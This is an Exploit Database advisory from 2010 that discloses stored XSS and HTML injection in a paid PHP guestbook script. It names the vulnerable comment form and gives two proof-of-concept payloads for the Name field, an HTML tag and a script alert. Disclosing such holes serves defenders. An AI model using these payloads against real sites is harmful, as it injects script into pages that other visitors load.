Guestbook Script PHP – Cross-Site Scripting / HTML Injection

• Exploit Database
• 9 阅读

• 作者： AnTi SeCuRe
  日期： 2010-08-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14648/

• =======================================================================
  # GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities
  =======================================================================
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  #################################
  #_____ ____/___/#
  # / ___/ \ \/ / / / #
  #(__) \ \/ / / /#
  # /____/ \__/ /_/ #
  #################################
  # Vendor: http://www.guestbookscripts.com/demo_guestbook.php
  # Date: 2010-08-15
  # Author: AnTi SeCuRe
  # Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Dr.$audi all Sa-ViRuS.CoM Members ..
  # Contact: AnTi-SeCuRe@HoTMaiL.CoM
  # Home: WwW.Sa-ViRuS.CoM
  ########################################################################
  
  [~]Note : Its not free ,, Its By 17,99
  [~]You Can Buy It From : http://www.guestbookscripts.com/buy_guestbook.php
  
  
  [~] HTML Injection Vuln . : http://server/demo_guestbook.php?act=new
  Add A New Comment And The exploit is in Name :)
  <p align="center"><b>Sa-ViRuS.CoM</b></p>
  
  
  
  [~] Xss Vuln. : http://server/demo_guestbook.php?act=new
  Add A New Comment And The exploit is in Name :)
  <script>alert('AnTi SeCuRe - Sa-ViRuS.CoM')</script>
  
  
  
  Thx To : Allah